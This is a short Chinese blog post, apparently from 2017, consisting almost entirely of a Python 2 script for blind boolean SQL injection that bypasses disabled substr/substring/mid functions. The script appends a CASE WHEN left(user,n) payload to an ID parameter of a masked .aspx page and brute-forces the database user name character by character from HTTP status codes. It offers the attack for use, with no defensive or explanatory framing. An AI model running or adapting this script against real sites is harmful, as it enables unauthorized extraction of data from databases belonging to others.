禁用substr、substring、mid函数的sql注入脚本

#encodeing=utf-8
import requests
import sys
  
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
  
headers = {
    'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'
    }
  
print "test..."
  
user=""
for i in range(1,7):
    for payload in payloads:
        user+=payload
        aaa="--"
        d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)
        test = d + aaa
        r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)
        if r.status_code==200:
            print user
            break
        else:
            user=user[:-1]

  

posted @ 2017-04-02 22:37  admin-神风  阅读(711)  评论(0)    收藏  举报